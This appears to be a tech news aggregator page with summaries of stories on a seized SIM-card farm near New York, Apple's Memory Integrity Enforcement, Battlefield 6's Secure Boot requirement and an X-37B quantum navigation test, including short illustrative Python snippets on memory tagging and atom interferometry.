Last month, federal investigators said they dismantled a China-linked plot that aimed to cripple New York City's telecommunications system by overloading cell towers, jamming 911 calls, and disrupting communications. According to law enforcement sources, the plot was even bigger than first thought. "Agents from Homeland Security Investigations found an additional 200,000 SIM cards at a location in New Jersey," according to ABC News. "That's double the 100,000 SIM cards, along with hundreds of servers, that were recently seized at five other vacant offices and apartments in and around the city." From the report: Investigators secured each of those locations, seized the electronics, and are now trying to track down who rented the spaces and filled them with shelves full of gear capable of sending 30 million anonymous text messages every minute, overloading communications and blacking out cellular service in a city that relies on it for emergency response and counterterrorism.

According to sources, the investigation began after several high-level people, including at least one with direct access to President Donald Trump, were targeted not only by swatters but also with actual threats received on their private phones.

"The potential threat these data centers pose to the public could include shutting down critical resources that the public needs, like the 911 system, or potentially impacting the public's ability to communicate everything, including business transactions," said Don Mihalek, an ABC News contributor who was formerly with the Secret Service.

Security

Apple Claims 'Most Significant Upgrade to Memory Safety' in OS History (apple.com) 39

"There has never been a successful, widespread malware attack against iPhone," notes Apple's security blog, pointing out that "The only system-level iOS attacks we observe in the wild come from mercenary spyware... historically associated with state actors and [using] exploit chains that cost millions of dollars..."

But they're doing something about it — this week announcing a new always-on memory-safety protection in the iPhone 17 lineup and iPhone Air (including the kernel and over 70 userland processes)... Known mercenary spyware chains used against iOS share a common denominator with those targeting Windows and Android: they exploit memory safety vulnerabilities, which are interchangeable, powerful, and exist throughout the industry... For Apple, improving memory safety is a broad effort that includes developing with safe languages and deploying mitigations at scale...

Our analysis found that, when employed as a real-time defensive measure, the original Arm Memory Tagging Extension (MTE) release exhibited weaknesses that were unacceptable to us, and we worked with Arm to address these shortcomings in the new Enhanced Memory Tagging Extension (EMTE) specification, released in 2022. More importantly, our analysis showed that while EMTE had great potential as specified, a rigorous implementation with deep hardware and operating system support could be a breakthrough that produces an extraordinary new security mechanism.... Ultimately, we determined that to deliver truly best-in-class memory safety, we would carry out a massive engineering effort spanning all of Apple — including updates to Apple silicon, our operating systems, and our software frameworks. This effort, together with our highly successful secure memory allocator work, would transform MTE from a helpful debugging tool into a groundbreaking new security feature.

Today we're introducing the culmination of this effort: Memory Integrity Enforcement (MIE), our comprehensive memory safety defense for Apple platforms. Memory Integrity Enforcement is built on the robust foundation provided by our secure memory allocators, coupled with Enhanced Memory Tagging Extension (EMTE) in synchronous mode, and supported by extensive Tag Confidentiality Enforcement policies. MIE is built right into Apple hardware and software in all models of iPhone 17 and iPhone Air and offers unparalleled, always-on memory safety protection for our key attack surfaces including the kernel, while maintaining the power and performance that users expect. In addition, we're making EMTE available to all Apple developers in Xcode as part of the new Enhanced Security feature that we released earlier this year during WWDC...

Based on our evaluations pitting Memory Integrity Enforcement against exceptionally sophisticated mercenary spyware attacks from the last three years, we believe MIE will make exploit chains significantly more expensive and difficult to develop and maintain, disrupt many of the most effective exploitation techniques from the last 25 years, and completely redefine the landscape of memory safety for Apple products. Because of how dramatically it reduces an attacker's ability to exploit memory corruption vulnerabilities on our devices, we believe Memory Integrity Enforcement represents the most significant upgrade to memory safety in the history of consumer operating systems.
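For readers unfamiliar with memory tagging, the mechanism underlying MTE/EMTE can be illustrated with a toy model. This is a sketch of the general tagging idea, not Apple's implementation: every allocation gets a small tag stored both in the pointer and alongside the memory, the memory's tag changes on free, and any access whose pointer tag no longer matches the memory's tag faults.

```python
import random

TAG_BITS = 4  # real MTE also uses 4-bit tags, carried in the pointer's top byte

class TaggedHeap:
    """Toy model of memory tagging (illustrative, not Apple's design)."""

    def __init__(self):
        self.mem_tags = {}  # address -> tag currently assigned to that memory
        self.data = {}

    def malloc(self, addr):
        tag = random.randrange(1 << TAG_BITS)
        self.mem_tags[addr] = tag
        return (addr, tag)  # a "pointer" here is (address, tag)

    def free(self, ptr):
        addr, _tag = ptr
        # Retag on free, so any stale copy of the old pointer mismatches.
        self.mem_tags[addr] = (self.mem_tags[addr] + 1) % (1 << TAG_BITS)

    def store(self, ptr, value):
        addr, tag = ptr
        if self.mem_tags.get(addr) != tag:
            raise MemoryError("tag mismatch: possible use-after-free/overflow")
        self.data[addr] = value

heap = TaggedHeap()
p = heap.malloc(0x1000)
heap.store(p, 42)  # tags match: store succeeds
heap.free(p)       # memory retagged
# heap.store(p, 7) # stale pointer: would raise MemoryError
```

Hardware MTE tags memory in 16-byte granules, and in the synchronous mode Apple describes, a mismatch faults on the offending instruction itself rather than being reported later.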

Games

Battlefield 6 Dev Apologizes For Requiring Secure Boot To Power Anti-Cheat Tools (arstechnica.com) 60

An anonymous reader quotes a report from Ars Technica: Earlier this month, EA announced that players in its Battlefield 6 open beta on PC would have to enable Secure Boot in their Windows OS and BIOS settings. That decision proved controversial among players who weren't able to get the finicky low-level security setting working on their machines and others who were unwilling to allow EA's anti-cheat tools to once again have kernel-level access to their systems. Now, Battlefield 6 technical director Christian Buhl is defending that requirement as something of a necessary evil to combat cheaters, even as he apologizes to any potential players that it has kept away.

"The fact is I wish we didn't have to do things like Secure Boot," Buhl said in an interview with Eurogamer. "It does prevent some players from playing the game. Some people's PCs can't handle it and they can't play: that really sucks. I wish everyone could play the game with low friction and not have to do these sorts of things." Throughout the interview, Buhl admits that even requiring Secure Boot won't completely eradicate cheating in Battlefield 6 long term. Even so, he offered that the Javelin anti-cheat tools enabled by Secure Boot's low-level system access were "some of the strongest tools in our toolbox to stop cheating. Again, nothing makes cheating impossible, but enabling Secure Boot and having kernel-level access makes it so much harder to cheat and so much easier for us to find and stop cheating." [...]

Despite all these justifications for the Secure Boot requirement on EA's part, it hasn't been hard to find people complaining about what they see as an onerous barrier to playing an online shooter. A quick Reddit search turns up dozens of posts complaining about the difficulty of getting Secure Boot on certain PC configurations or expressing discomfort about installing what they consider a "malware rootkit" on their machine. "I want to play this beta but A) I'm worried about bricking my PC. B) I'm worried about giving EA complete access to my machine," one representative Redditor wrote.

Space

America's Secretive X-37B Space Plane Will Test a Quantum Alternative to GPS for the US Space Force (space.com) 22

The mysterious X-37B space plane — the U.S. military's orbital test vehicle — "serves partly as a platform for cutting-edge experiments," writes Space.com

And "one of these experiments is a potential alternative to GPS that makes use of quantum science as a tool for navigation: a quantum inertial sensor." This technology could revolutionize how spacecraft, airplanes, ships and submarines navigate in environments where GPS is unavailable or compromised. In space, especially beyond Earth's orbit, GPS signals become unreliable or simply vanish. The same applies underwater, where submarines cannot access GPS at all. And even on Earth, GPS signals can be jammed (blocked), spoofed (making a GPS receiver think it is in a different location) or disabled — for instance, during a conflict... Traditional inertial navigation systems, which use accelerometers and gyroscopes to measure a vehicle's acceleration and rotation, do provide independent navigation, as they can estimate position by tracking how the vehicle moves over time... Eventually though, without visual cues, small errors will accumulate and you will entirely lose your positioning...

At very low temperatures, atoms obey the rules of quantum mechanics: they behave like waves and can exist in multiple states simultaneously — two properties that lie at the heart of quantum inertial sensors. The quantum inertial sensor aboard the X-37B uses a technique called atom interferometry, where atoms are cooled to temperatures near absolute zero, so they behave like waves. Using fine-tuned lasers, each atom is split into what's called a superposition state, similar to Schrödinger's cat, so that it simultaneously travels along two paths, which are then recombined.

Since the atom behaves like a wave in quantum mechanics, these two paths interfere with each other, creating a pattern similar to overlapping ripples on water. Encoded in this pattern is detailed information about how the atom's environment has affected its journey. In particular, the tiniest shifts in motion, like sensor rotations or accelerations, leave detectable marks on these atomic "waves". Compared to classical inertial navigation systems, quantum sensors offer orders of magnitude greater sensitivity. Because atoms are identical and do not change, unlike mechanical components or electronics, they are far less prone to drift or bias. The result is long-duration, high-accuracy navigation without the need for external references.
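In the standard Mach-Zehnder atom-interferometer configuration, the acceleration readout described above takes a simple form: the phase shift is delta_phi = k_eff * a * T^2, where k_eff is the effective laser wavevector and T the time between laser pulses. The rubidium wavelength and pulse spacing below are illustrative assumptions, not details of the X-37B sensor:

```python
import math

def interferometer_phase(accel, T, wavelength=780e-9):
    """Acceleration phase of a Mach-Zehnder atom interferometer:
    delta_phi = k_eff * a * T^2, with k_eff = 2 * (2*pi/wavelength)
    for a two-photon Raman transition (780 nm is rubidium)."""
    k_eff = 2 * (2 * math.pi / wavelength)
    return k_eff * accel * T**2

# Sensing 1 g with 100 ms between pulses gives a phase of roughly a
# million radians, so even nano-g accelerations shift the fringes.
phi = interferometer_phase(9.81, 0.1)
```

The quadratic dependence on T is one reason orbit is attractive for such sensors: longer free-fall times between pulses directly boost sensitivity.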

The upcoming X-37B mission will be the first time this level of quantum inertial navigation is tested in space.

The article points out that a quantum navigation system could be crucial "for future space exploration, such as to the Moon, Mars or even deep space," where autonomy is key and when signals from Earth are unavailable.

"While quantum computing and quantum communication often steal headlines, systems like quantum clocks and quantum sensors are likely to be the first to see widespread use."
